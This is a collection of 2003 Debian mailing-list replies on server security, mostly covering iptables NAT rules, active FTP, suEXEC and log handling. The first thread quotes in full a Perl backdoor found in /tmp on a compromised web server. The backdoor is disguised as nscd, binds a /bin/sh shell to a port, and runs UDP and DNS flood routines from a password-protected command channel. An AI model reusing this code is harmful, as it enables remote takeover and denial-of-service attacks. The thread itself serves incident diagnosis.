Re: a weird script worm uploaded via php with debian 3.0 ?

2003-06-11 Thread Victor Calzado Mayo

Hi

On Tuesday 10 June 2003 21:58, Robert Ebright wrote:

Have you copied the home directory of the user www-data to the new server?
In Debian it is located in the root directory of the web server, so if you have 
copied the document root from the old server you have copied all the dot files for 
the user, and quite possibly you have copied the crontab file of www-data.

If you look at the syslog entries you can figure out how the worm replicates itself 
and how the rootkit is enabled (only guessing).


> and under SYSLOG it starts
>
the system finds a crontab for the user www-data

user www-data has executed the command crontab -l

> syslog.3:Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)

and has replaced the file

> syslog.3:Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)

hmmm, maybe he isn't very smart, www-data has done it again

> syslog.3:Jun  6 16:27:34 debian crontab[26804]: (www-data) LIST (www-data)
> syslog.3:Jun  6 16:27:34 debian crontab[26807]: (www-data) REPLACE (www-data)

cron sees the new crontab file for www-data, reads the file, and executes the 
commands...
> syslog.3:Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)
>

hmmm, you have to figure out how /tmp/.nscdrecover has been copied; it is 
difficult to say, but maybe another crontab entry of the user www-data starts 
the work... who knows...


> so I found /tmp/.ncsdrecover and it looks like
> some kind of port scanner/trojan
>

it sounds like a local exploit against nscd which is trying to get a root 
shell and put it on the wire


> the contents are pasted below
>
>
> #!/usr/bin/perl -w
>
> $pass = "J9YcGEyNypkzI";
> $str = 'Mess with the best - die like a rest!'x1337;
> use IO::Socket;
> use IO::Select;
> use POSIX;
>
> sub redir
> {
> my $port = shift;
> my $dest = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> $sa = IO::Socket::INET->new( Proto => "tcp", Listen => 1, ReuseAddr => 1, LocalPort => $port) or exit;
> $sin = $sa->accept or exit;
> close($sa);
> alarm 0;
> $sout = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $dest) or exit;
> $sin->autoflush(1);
> $sout->autoflush(1);
> $sel = IO::Select->new($sin, $sout);
> while(@sock = $sel->can_read(180)) {
> foreach $s(@sock) {
> $buf = <$s>; exit unless($buf);
> print $sout $buf if($s eq $sin);
> print $sin $buf if($s eq $sout);
> }}}
>
> sub shell
> {
> my $port = shift;
> $SIG{ALRM} = sub { exit };
> alarm 60;
> use Socket;
> socket(S, PF_INET, SOCK_STREAM, 0);
> setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
> bind(S, sockaddr_in($port, INADDR_ANY));
> listen(S, 1);
> accept(X, S);
> close(S);
> alarm 0;
> open STDIN, "<&X";
> open STDOUT, ">&X";
> open STDERR, ">&X";
> close X;
> exec("/bin/sh");
> }
>
> sub udp
> {
> my $host = shift;
> my $time = shift;
> $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => int(rand 65535)) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> print $sock $str while(1);
> }
>
> sub ddns
> {
> my $host = shift;
> my $time = shift;
> $sock = new IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => 53) or exit;
> $sock->autoflush(1);
> $SIG{ALRM} = sub { exit };
> alarm 15 unless(alarm $time);
> while(1) {
> my $s = int(rand(89)+10);
> my $r1 = int(rand(89)+10);
> my $r2 = int(rand(89)+10);
> my $r3 = int(rand(89)+10);
> my $r4 = int(rand(89)+10);
> send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
>
> $0 = '/usr/sbin/nscd'.' 'x100;
> exit if fork;
> $SIG{ALRM} = 'IGNORE';
> $SIG{TERM} = 'IGNORE';
> $SIG{CHLD} = 'IGNORE';
> $SIG{INT} = 'IGNORE';
> $SIG{QUIT} = 'IGNORE';
> $SIG{HUP} = 'IGNORE';
> open STDIN, "</dev/null";
> open STDOUT, ">/dev/null";
> open STDERR, ">/dev/null";
> POSIX::setsid();
>
> $csock = IO::Socket::INET->new(Proto => 'udp', LocalPort => 1337, ReuseAddr => 1) or exit;
> while($string = <$csock>)
> {
> chop($string);
> my ($pw, $cmd, $arg1, $arg2) = split " ", $string;
> next unless($cmd);
> next unless($arg1);
> next unless(crypt($pw, $pass) eq $pass);
> if ($cmd eq "ping") {
> my $bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $arg1, PeerPort => $arg2, ReuseAddr => 1) or next;
> print $bsock "pong
> ".`uname -mnrs`; close $bsock;
> 
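The sequence Victor walks through in the syslog excerpt (a service account rewriting its own crontab, then cron running a hidden file out of /tmp) can be picked up mechanically. The script below is an added example, not from the thread; the log lines in it are constructed to mirror the excerpt, and the list of service accounts is an assumed default.

```shell
#!/bin/sh
# Added example, not from the thread: correlate the two syslog events that
# the excerpt shows for www-data, a crontab REPLACE by a service account and a
# later cron CMD that runs something from a world-writable directory.
# The log lines below are constructed, modelled on that excerpt.
SAMPLE_LOG='Jun  6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)
Jun  6 16:27:28 debian crontab[26798]: (www-data) REPLACE (www-data)
Jun  6 16:30:01 debian /USR/SBIN/CRON[26850]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
Jun  6 16:45:01 debian /USR/SBIN/CRON[26901]: (www-data) CMD (/usr/bin/php /var/www/cleanup.php)
Jun  6 17:00:01 debian /USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover)'

# find_cron_abuse LOGTEXT [ACCOUNTS]
# Prints, in log order:
#   REPLACE <user> pid=<pid>   when a listed service account rewrote its crontab
#   TMPEXEC <user> <command>   when cron ran a command for such an account
#                              from /tmp, /var/tmp or /dev/shm
# Service accounts have no business calling crontab(1), so each line is worth
# an alert on its own; together they are the sequence behind /tmp/.nscdrecover.
find_cron_abuse() {
    printf '%s\n' "$1" | awk -v accounts="${2:-www-data nobody}" '
    BEGIN { n = split(accounts, a, " "); for (i = 1; i <= n; i++) svc[a[i]] = 1 }
    # crontab[<pid>]: (<user>) REPLACE (<user>)
    /crontab\[[0-9]+\]: \([^)]+\) REPLACE \(/ {
        u = $0; sub(/.*crontab\[[0-9]+\]: \(/, "", u); sub(/\).*/, "", u)
        p = $0; sub(/.*crontab\[/, "", p); sub(/\].*/, "", p)
        if (u in svc) print "REPLACE", u, "pid=" p
    }
    # /USR/SBIN/CRON[<pid>]: (<user>) CMD (<command>)
    /CRON\[[0-9]+\]: \([^)]+\) CMD \(/ {
        u = $0; sub(/.*CRON\[[0-9]+\]: \(/, "", u); sub(/\).*/, "", u)
        c = $0; sub(/.*\) CMD \(/, "", c); sub(/\)$/, "", c)
        if ((u in svc) && c ~ /^\/(tmp|var\/tmp|dev\/shm)\//) print "TMPEXEC", u, c
    }'
}

find_cron_abuse "$SAMPLE_LOG"
```

Run it against a real syslog with `find_cron_abuse "$(cat /var/log/syslog)"`; the two output lines for the sample are the REPLACE by www-data and the /tmp execution.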


Re: chattr +a in /var/log files

2003-05-09 Thread Victor Calzado Mayo

Hi from .es where everything else is a joke too :PP
On Thursday 08 May 2003 21:44, Juan Carlos Silla. wrote:
> Hello *:
>
> I would like to set the 'a' bit for files in /var/log/ but it makes it
> impossible for logrotate to rotate log files normally.  Is it enough to set
> chattr -a in the prerotate script? How useful is setting the 'a' bit for log files?
> Not much I think, if an intruder gains root access... he could unset the
> append attribute too. Not?

I don't think this kind of thing improves security, but if you stop to think 
you could see a lot of problems related to this change, not only in logrotate 
log rotation but in every other system that needs to do so.
If you want secure logging maybe you will find the remote syslogging thread 
interesting.

http://lists.debian.org/debian-security/2003/debian-security-200304/msg00271.html

I've seen a lot of problems related to 'chattr and hardening' and I can't see 
the goodness of the idea even on a happy day.

Regards
Victor


>
> Regards from .es -where adsl is a joke.

-- 
"The world is made day by day with the effort of the intelligent, but it is 
the imbeciles who enjoy it."



Re: Apache http server 2.0

2003-04-28 Thread Victor Calzado Mayo

Hi
On Sunday 27 April 2003 00:53, Justin [GHA] wrote:
> I tried the following query and didn't experience anything odd.
> http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22%2C.%2F%5C%5B%5D%
>2 [EMAIL PROTECTED]
>
> The hex here is the string ,./[EMAIL PROTECTED]()-{}<>;:| '"
> Any combination of these characters will result in only the header of the
> google search, and the copyright, being displayed.

Probably I'm missing something but Google's behaviour seems normal to me and very 
secure too.

Google's CGI parses out any special character that it receives and only takes care 
of the alphanumeric queries; try an empty query in Google and you will get 
exactly the same page that your query gets; add "potato" to your query string 
and you get the results for the "potato" search.

The final result is that Google's CGI doesn't let you feed it any special 
character.


>
> I also tried queries such as "�"  This returned the same
> results.  Although, a query of "0" returned appropriate results,
> "/" returned nothing again.  It is speculated that all characters with
> an ASCII value of 0-47, excluding 42, will return nothing.
>
> Further research is need, however, this may only be a bug, rather than
> something that is exploitable.

I think that Google's CGI does exactly what Google's people expect.
:))

>
> http://search.yahoo.com/bin/[EMAIL PROTECTED]
>E %3D%2B%28%29-%7B%7D%3C%3E%3B%3A%7C+%27%22&ei=UTF-8 also did not display
> anything odd

Yahoo did not parse out anything, but as you say there's nothing "wrong" with 
the results page.

>
> -Justin
> GHA - http://gha.bravepages.com
>
>
>
> - Original Message -
> From: "Kim De Smaele" <[EMAIL PROTECTED]>
> To: 
> Cc: 
> Sent: Friday, April 25, 2003 5:20 PM
> Subject: Apache http server 2.0
>
> > Hi all,
> >
> > I experienced a very strange apache response today in our production
> > environment at work. A user in a discussion room made a posting containing
> > the following characters:
> >
> > ,,''
> >
> > This gave the result that several pages could no longer be displayed.
> > I also tried this on the search engine http://www.google.com which gave the
> > same result. No results, and not even the message "no results
> > found..." could be displayed. If you keep on refreshing you will
> > notice that also the google logo will disappear.
> > On our servers, we didn't notice anything in the logs.
> >
> > I have done a test with several browsers and I had every time the same
> > result as described above:
> >
> > Internet Explorer
> > Netscape (windows)
> > Mozilla (Linux)
> > Opera (Linux)
> >
> > Personally I'm not sure but I'm getting the idea that this might be
> > exploitable. For example, executing code/commands after using the
> > characters as mentioned above followed by the code or the commands in a
> > search engine, discussion rooms,...
> >
> > Kind regards,
> >
> > Kim De Smaele
> >
> >

-- 
April
One of the worst months for dragging the world into absurd wars.
The other months of the same kind are: January, February, March, May, June, 
July, August, September, October, November and December.



Re: iptables rule to block when DNAT is used

2003-04-08 Thread Victor Calzado Mayo

Hi
On Tuesday 08 April 2003 03:04, Hanasaki JiJi wrote:
> Firewall has rules to DNAT incoming traffic to a port on a DMZ box.
>
> how can an iptable rule be written to block some ip addresses before
> they get to the rules
>   iptables -t mangle -A FORWARD
>   AND
>   iptables -t nat -A PREROUTING
> ???

PREROUTING must be, and can only be, filtered in the FORWARD hook.

Best Regards
Victor



-- 
April
One of the worst months for dragging the world into absurd wars.
The other months of the same kind are: January, February, March, May, June, 
July, August, September, October, November and December.



Re: iptables forwarding to inside firewall

2003-03-31 Thread Victor Calzado Mayo

Hi
On Monday 31 March 2003 02:24, Paul Hampson wrote:
> On Sun, Mar 30, 2003 at 05:23:10PM -0500, Robert Brockway wrote:
> > On Fri, 28 Mar 2003, Hanasaki JiJi wrote:
> > > Working on running a SMTP server inside the firewall that takes
> > > incoming SMTP traffic from outside the firewall.  The below rules are
> > > not working.  The firewall refuses connections.  Any input on what
> > > wrong?
> >
> > If a remote exploit is found in the MTA running on your internal host (as
> > has just occurred with sendmail again), an attacker may be able to launch
> > a direct attack on this box.  Depending on your overall security
> > structure they may then be able to attack any number of hosts behind your
> > firewall.
> >
> > Some of the alternatives aren't much better.  Running an MTA on your
> > firewall is just as bad as a remote exploit here may allow an attacker
> > access to root on the firewall, allowing the firewall to be
> > circumvented again.
> >
> > If you have more than 1 static address, an MTA running in a DMZ is
> > definitely better.  This way you could still have your internal MTA being
> > port forwarded but restrict access through the firewall by source address,
> > such that only your MTA in the DMZ can access the port redirect.  If you
> > can restrict access by way of network interface on the firewall[1] then
> > you're much much better off again as this protects against a spoof.
>
> I don't quite follow this... Surely if one can break into the
> port-forwarded MTA, one can break into DMZ's MTA, which would
> then allow the attacker to access the port-forwarding anyway?

I think so; it only depends on how paranoid you are and how many levels of 
security you think you need. A lot of people could say a lot of things 
against proxies, multiplexors, and talk about the virtues of a NATed 
environment...

Going back to the original thread, I think the problem should be in the forward 
rule of the internal interface; I can't see any rule like that in the rules, 
and if the default policy of the forward hook is DROP the packets will be 
rejected at this point. A forward rule allowing this traffic should permit 
incoming traffic to the internal SMTP server.

Best Regards
Victor





-- 
March
One of the worst months for dragging the world into absurd wars.
The other months of the same kind are: January, February, April, May, June, 
July, August, September, October, November and December.






Re: iptables help to forward ports please

2003-03-20 Thread Victor Calzado Mayo

On Thursday 20 March 2003 06:26, Hanasaki JiJi wrote:
> been trying to get the following to work for some time, input is most
> appreciated
>
>
> internet <=25= firewall iptablerule =port#x=> internalSMTPhost
>
> how can the firewall be told to:
>   take all incoming tcp port 25 traffic and send it to
>   smtp host on port X


iptables -t nat -A PREROUTING  -p tcp --dport 25 -j DNAT --to-destination \
$SMTP_HOST:$port

Remember that if you want to apply filters to a destination-NATed port you 
have to do it in the FORWARD hook (not in the INPUT hook as usual), so if 
you have DROP as the default policy in the FORWARD hook DNAT won't work until 
you ACCEPT in FORWARD the connections destined to these DNATed ports.


>
>   take all outgoing traffic from smtphost 
>   and send it out to the internet on port 25

iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \
--to INTERNET

This rule is not exactly what you asked for, but you have to take care not only 
of SMTP traffic; the SMTP server also needs to perform lookups to DNS servers 
(yes, you can assign a local one...).

Anyway, if you need/want only SMTP connections to be NATed you can define the 
destination port (25) (add --dport 25 to the nat rule) rather than the source 
port (even if you know for sure that SMTP connections are only established 
from this port) (someone on the SMTP host could connect to any host at any 
port using 25 as the source TCP port; if you define a destination port this kind 
of malicious connection is disallowed), but you can also specify a source 
port (--sport 25)

iptables -t nat -A POSTROUTING -p tcp -s $SMTP_HOST -j SNAT \
--to INTERNET:25 --dport 25 --sport 25


>
> Thank you.
Kind Regards 
Victor
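The rule set Victor describes here, together with his answers in the two earlier iptables threads on this page (DNAT is rewritten in nat/PREROUTING, so the resulting connections, and any source addresses you want to block, are filtered in FORWARD rather than INPUT, and the DNAT silently fails under a FORWARD DROP policy until that ACCEPT exists), written out as an added example that is not code from the list. The interface name, addresses and the block list are assumed placeholder values (RFC 5737 ranges); with DRY_RUN=1, the default, it only prints the rules.

```shell
#!/bin/sh
# Added example, not from the thread. Assumed values; override from the environment.
EXT_IF="${EXT_IF:-eth0}"
PUBLIC_IP="${PUBLIC_IP:-203.0.113.1}"        # firewall's Internet address
SMTP_HOST="${SMTP_HOST:-192.0.2.10}"         # internal MTA behind the firewall
SMTP_PORT="${SMTP_PORT:-2525}"               # port the internal MTA listens on
BLOCKED_SRCS="${BLOCKED_SRCS:-198.51.100.0/24 203.0.113.77}"   # constructed block list
IPTABLES="${IPTABLES:-iptables}"
DRY_RUN="${DRY_RUN:-1}"                      # 1 = print the rules, 0 = load them (root)

RULES=""   # every rule issued, one per line, in order (lets the ordering be checked)

ipt() {
    RULES="${RULES}${IPTABLES} $*
"
    if [ "$DRY_RUN" = 1 ]; then echo "$IPTABLES $*"; else "$IPTABLES" "$@"; fi
}

# 1-based position of the first issued rule matching PATTERN (ERE), or empty.
rule_index() { printf '%s' "$RULES" | grep -n -E -e "$1" | head -n 1 | cut -d: -f1; }

build_smtp_dnat() {
    RULES=""
    # Nothing crosses the firewall unless a FORWARD rule allows it. This is why
    # a bare DNAT "does not work": the packet is rewritten in nat/PREROUTING and
    # then dropped by this policy.
    ipt -P FORWARD DROP
    ipt -F FORWARD
    ipt -t nat -F PREROUTING
    ipt -t nat -F POSTROUTING
    # Source blocks come first in FORWARD. The nat table only sees the first
    # packet of each connection and is not for filtering; FORWARD is.
    for src in $BLOCKED_SRCS; do
        ipt -A FORWARD -i "$EXT_IF" -s "$src" -j DROP
    done
    # Rewrite inbound port 25 to the internal MTA on its own port.
    ipt -t nat -A PREROUTING -i "$EXT_IF" -p tcp --dport 25 \
        -j DNAT --to-destination "$SMTP_HOST:$SMTP_PORT"
    # FORWARD sees the packet after DNAT, so match the rewritten destination
    # (internal address and port), not the public address or port 25.
    ipt -A FORWARD -i "$EXT_IF" -p tcp -d "$SMTP_HOST" --dport "$SMTP_PORT" \
        -m state --state NEW -j ACCEPT
    ipt -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    # Outbound mail from the MTA, plus the DNS lookups it needs to deliver it.
    ipt -A FORWARD -o "$EXT_IF" -s "$SMTP_HOST" -p tcp --dport 25 -j ACCEPT
    ipt -A FORWARD -o "$EXT_IF" -s "$SMTP_HOST" -p udp --dport 53 -j ACCEPT
    ipt -A FORWARD -o "$EXT_IF" -s "$SMTP_HOST" -p tcp --dport 53 -j ACCEPT
    # Hide the private address on the way out; the source port is left alone.
    ipt -t nat -A POSTROUTING -o "$EXT_IF" -s "$SMTP_HOST" \
        -j SNAT --to-source "$PUBLIC_IP"
}

build_smtp_dnat
```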






Re: new pam error message in logs

2003-03-17 Thread Victor Calzado Mayo

Hi
there's an open bug in sid related to pam limits and ssh: 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=171673.

On Monday 17 March 2003 15:10, Adrian 'Dagurashibanipal' von Bidder wrote:
> Hi!
>
> The symptoms are:
>
> Mar 17 14:08:20 syydelaervli pam_limits[24325]: setrlimit limit #7 to soft=-1, hard=-1 failed: Operation not permitted; uid=0 euid=0
> Mar 17 14:09:09 syydelaervli pam_limits[24332]: setrlimit limit #7 to soft=-1, hard=-1 failed: Operation not permitted; uid=0 euid=0
>
> [EMAIL PROTECTED]:~# dpkg -l libpam0g libc6 ssh
> Desired=Unknown/Install/Remove/Purge/Hold
> | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
> |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
> ||/ Name           Version        Description
> +++-==============-==============-============================================
> ii  libpam0g       0.76-9         Pluggable Authentication Modules library
> ii  libc6          2.3.1-14       GNU C Library: Shared libraries and Timezone
> ii  ssh            3.4p1-4        Secure rlogin/rsh/rcp replacement (OpenSSH)
> [EMAIL PROTECTED]:~#
>
> I get these messages occasionally, the process in question is ssh (after
> authenticating with pubkey and the 'session opened for user ...'
> message).
>
> I didn't get them before the last pam & libc upgrade, but I haven't got
> an idea what versions were there.
>
> any ideas?
>
> cheers
> -- vbi






Re: iptables and apt-get

2003-03-11 Thread Victor Calzado Mayo

Hi there
On Tuesday 11 March 2003 15:48, Ian Goodall wrote:
> All is fine now. Adding the line:
>
> iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
>
> fixes the problem. Does anyone know what this line does? I found this using
> an online script generator at http://www.iptables.1go.dk/index1.php.

You are probably using some ftp server in your sources.list, and probably 
you are using the so-called active ftp; in this kind of connection the server 
itself initiates the data transfer connection with the client host (so SYNs 
are sent directly from server to client, and in a firewalled environment 
they are dropped).

The added rule takes care of this kind of connection, telling iptables that 
SYNs sent from the ftp server to the client host are related to an 
established ftp connection opened from the client host to the server and 
should be permitted (even when they come with a SYN request from the server) 
(it acts like a state module (somehow related to the ip_masq modules for ftp, 
quake or irc) that ensures that this kind of connection (that uses a range of 
ports higher than 1023, but not assigned until the connection is established) 

I hope it helps, excuse my English, and have a look at the Netfilter Howto; any 
good page about ftp servers in firewalled environments will help too. Have a 
look at:
 
http://slacksite.com/other/ftp.html

And if you are very very interested you can always look for the ftp RFC.

>
> Thanks for all your help. This is the sort of thing that this list should
> be used for instead of debating what should be on it / other spam :)
> - Original Message -


Kind Regards
Victor


> From: "I.R.van Dongen" <[EMAIL PROTECTED]>
> To: "Ian Goodall" <[EMAIL PROTECTED]>
> Cc: 
> Sent: Tuesday, March 11, 2003 12:59 PM
> Subject: Re: iptables and apt-get
>
> > iptables -A OUTPUT -p tcp -d /32 --dport 80 -j ACCEPT
> >
> > On Tue, 11 Mar 2003 00:45:48 -
> >
> > "Ian Goodall" <[EMAIL PROTECTED]> wrote:
> > > Hi Guys,
> > >
> > > I am setting up iptables on my debian woody box. I have decided to
> > > close
>
> everything and then open up just ssh and ssl. This obviously prevents my
> apt-get update from working. What ports do I need to open for this to work.
> If it helps I am going through a proxy to get to the internet.
>
> > > Thanks
> > >
> > > ijg0
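To make the active-ftp explanation above concrete, here is an added example (not code from the thread) of a host firewall for the apt client: the ESTABLISHED,RELATED rule accepts the server-initiated data connection only because the kernel's ftp connection-tracking helper (the successor of the ip_masq ftp module Victor mentions: ip_conntrack_ftp on the 2.4 kernels of the time, nf_conntrack_ftp today) classifies that SYN as RELATED to the control connection the client opened. Mirror and proxy addresses and ports are assumed values; DRY_RUN=1, the default, prints instead of loading.

```shell
#!/bin/sh
# Added example, not from the thread. Assumed values (RFC 5737 ranges):
FTP_MIRROR="${FTP_MIRROR:-192.0.2.20}"       # ftp mirror named in sources.list
PROXY="${PROXY:-198.51.100.5}"               # http proxy used by apt
PROXY_PORT="${PROXY_PORT:-3128}"
IPTABLES="${IPTABLES:-iptables}"
DRY_RUN="${DRY_RUN:-1}"                      # 1 = print, 0 = load (needs root)
RULES=""                                     # rules issued, in order
HELPER=""                                    # conntrack helper loaded, if any

ipt() {
    RULES="${RULES}${IPTABLES} $*
"
    if [ "$DRY_RUN" = 1 ]; then echo "$IPTABLES $*"; else "$IPTABLES" "$@"; fi
}
rule_index() { printf '%s' "$RULES" | grep -n -E -e "$1" | head -n 1 | cut -d: -f1; }

# build_client_rules with-helper|no-helper
# Active ftp: after the client opens control port 21, the server opens the
# data connection itself, from its port 20 to the high port the client named
# in its PORT command. With the helper loaded, conntrack reads that PORT
# command and marks the server's SYN as RELATED, so the state rule below
# accepts it. Without the helper the same SYN is merely NEW to a port no rule
# lists and dies on the INPUT DROP policy: the apt-get-over-ftp failure from
# the thread. Either way no blanket opening of high ports is needed or made.
build_client_rules() {
    RULES=""; HELPER=""
    if [ "$1" = with-helper ]; then
        HELPER=nf_conntrack_ftp              # ip_conntrack_ftp on 2.4 kernels
        if [ "$DRY_RUN" = 1 ]; then echo "modprobe $HELPER"; else modprobe "$HELPER"; fi
    fi
    ipt -P INPUT DROP
    ipt -P OUTPUT DROP
    ipt -F INPUT
    ipt -F OUTPUT
    ipt -A INPUT -i lo -j ACCEPT
    ipt -A OUTPUT -o lo -j ACCEPT
    # Replies to connections this host started, plus anything a helper has
    # tied to one of them (the active-ftp data channel).
    ipt -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    ipt -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    # Only what this host is meant to serve (ssh) or initiate (apt, DNS).
    ipt -A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT
    ipt -A OUTPUT -p udp --dport 53 -m state --state NEW -j ACCEPT
    ipt -A OUTPUT -p tcp -d "$PROXY" --dport "$PROXY_PORT" -m state --state NEW -j ACCEPT
    ipt -A OUTPUT -p tcp -d "$FTP_MIRROR" --dport 21 -m state --state NEW -j ACCEPT
}

build_client_rules with-helper
```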






Re: Apache Virtual Hosts Chroot ?

2003-02-25 Thread Victor Calzado Mayo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi

You may find Apache's suEXEC wrapper useful; it can be configured to be 
used inside a VirtualHost...

http://httpd.apache.org/docs/suexec.html

This won't work with PHP scripts if you have mod_php.so loaded (the PHP 
interpreter will run as the Apache user), but if load is not a problem you can 
run PHP scripts as CGIs using php4 as an external handler (maybe only in the 
locations where users' PHP scripts could be dangerous).

Have a look at:
http://www-pat.fnal.gov/cern/mipsabi.html

and:
http://www.psoft.net/HSdocumentation/sysadmin/php_installation.html

Just my two cents

Victor


On Tuesday 25 February 2003 10:15, debian-isp wrote:
> Hi all !
>
> I am just asking myself how to secure our webserver with a couple of
> virtual hosts. Currently we have a large installation of typo3 running. It
> has a feature called fileadmin with which you can easily upload files. As
> it is thereby possible to upload php scripts and execute them via the
> browser, it is in my opinion possible to access other users' files, as the
> webserver and the files all have the same user, needed by the system. Is
> there a way to secure this:
>
> - chrooting virtual hosts in apache ?
> - running multiple instances of apache
> - some kind of security system with users and groups
> - using directory settings ?
>
> Any ideas
>
> __
> Nik Engel NETWAYS GmbH
> Senior Systems Engineer   Deutschherrnstr. 47a
> Fon.0911/92885-13 D-90429 Nürnberg
> Fax.0911/92885-33
> [EMAIL PROTECTED] www.netways.de
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+W1WNEzqHF8R72ekRAuhgAJ9Lnjc09t4RX/VHzggFsH1untbz7ACfTYwN
t4rVOUI/OhUAJXLMifICoWo=
=de0N
-END PGP SIGNATURE-


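The setup Victor sketches above (suEXEC per VirtualHost, PHP run as a CGI instead of under mod_php) as an added example; this is not code from the thread, from Debian or from Apache. The uid minimum suEXEC was compiled with, the path of the php4-cgi binary and the directory layout under each customer's home are assumptions:

```shell
#!/bin/sh
# Added example, not from the thread, Debian or Apache: per-vhost PHP as
# CGI under suEXEC on Apache 1.3, so a .php file one customer uploads
# through typo3's fileadmin runs as that customer's uid instead of the
# shared Apache user. SUEXEC_UIDMIN, PHP_CGI and the $home layout are
# assumptions; check them against your own suexec build and php4-cgi.
SUEXEC_UIDMIN="${SUEXEC_UIDMIN:-100}"        # assumed compile-time minimum uid
PHP_CGI="${PHP_CGI:-/usr/lib/cgi-bin/php4}"  # assumed php4-cgi binary

# VirtualHost for one customer. User/Group inside the vhost tell suEXEC
# which uid/gid to switch to; Action (mod_actions) routes every .php
# request to a wrapper in the customer's own cgi-bin, which is the file
# suEXEC actually executes.
vhost_conf() {
    name=$1; user=$2; grp=$3; home=$4
    cat <<EOF
<VirtualHost *>
    ServerName $name
    User $user
    Group $grp
    DocumentRoot $home/htdocs
    ScriptAlias /cgi-bin/ $home/cgi-bin/
    AddHandler php-cgi .php
    Action php-cgi /cgi-bin/php-wrapper
</VirtualHost>
EOF
}

# Body of $home/cgi-bin/php-wrapper. It has to be owned by the customer,
# because suEXEC refuses to run a file owned by anyone else.
wrapper_body() {
    printf '#!/bin/sh\nexec %s\n' "$PHP_CGI"
}

# Pre-flight the checks suEXEC itself makes before running a file: target
# uid not below the minimum, file and its directory owned by the target
# user, neither writable by group or other, no setuid/setgid bit on the
# file. Prints the first violated rule and returns 1, or returns 0 when
# suEXEC would accept the file. Uses GNU stat, as on Debian.
suexec_check() {
    file=$1; user=$2
    dir=$(dirname "$file")
    uid=$(id -u "$user" 2>/dev/null) || { echo "no such user: $user"; return 1; }
    [ "$uid" -ge "$SUEXEC_UIDMIN" ] || { echo "uid $uid below minimum $SUEXEC_UIDMIN"; return 1; }
    [ "$(stat -c %U "$file")" = "$user" ] || { echo "$file not owned by $user"; return 1; }
    [ "$(stat -c %U "$dir")" = "$user" ]  || { echo "$dir not owned by $user"; return 1; }
    for p in "$file" "$dir"; do
        mode=$(stat -c %a "$p")            # e.g. 755 or 4755, no leading zero
        ow=$((mode % 10)); gw=$((mode / 10 % 10)); sp=$((mode / 1000))
        [ $((ow & 2)) -eq 0 ] && [ $((gw & 2)) -eq 0 ] ||
            { echo "$p is writable by group or other"; return 1; }
        [ "$p" != "$file" ] || [ $((sp & 6)) -eq 0 ] ||
            { echo "$file is setuid or setgid"; return 1; }
    done
    return 0
}
```

suEXEC also refuses anything outside the document root it was built with, so `$home` has to live under that path; and the isolation only holds if each customer's files are really owned by a distinct uid, otherwise the check passes for everyone and nothing has been gained over mod_php.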


Re: cluster on firewall?

2003-02-07 Thread Victor Calzado Mayo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Thursday 06 February 2003 09:32, Kristof Goossens wrote:
> On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote:
> > Hi
> >
> > I have setup a firewall with 4 legs as follows:
> > * One leg goes to the router (cisco).
> > * Second leg goes to a switch connected to the internal network
> >   (10.20...).
> > * The third and fourth legs are both for the dmz. one goes to a
> >   switch with many dmz hosts connected to it, and the other goes
> >   directly to an isolated dmz host (which the firewall acts as a
> >   proxy-arp for it).
> >
> > I've used woody+iptables+shorewall for this setting.
> >
> > Now, since the firewall is the most critical host, I want to setup some
> > kind of failsafe, so even if that host dies all the traffic will go
> > through another host.
> >
> > Since I don't even have an idea where to start, I'll appreciate any
> > ideas/comments/pointers to documentations, etc...
>
> check out the heartbeat package. It might be just the thing you are looking
> for...
>
> Kind regards,
>   Kristof
You might find the vrrpd code useful:
apt-cache show vrrpd

Kind regards 
Victor
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+Q3EUEzqHF8R72ekRAsQHAJ9UpiiWaUQLN/fYssakOB3E6QplLwCfVbZX
H1Y5HmaAAlw8Y3bFn5WtnZQ=
=fpqN
-END PGP SIGNATURE-


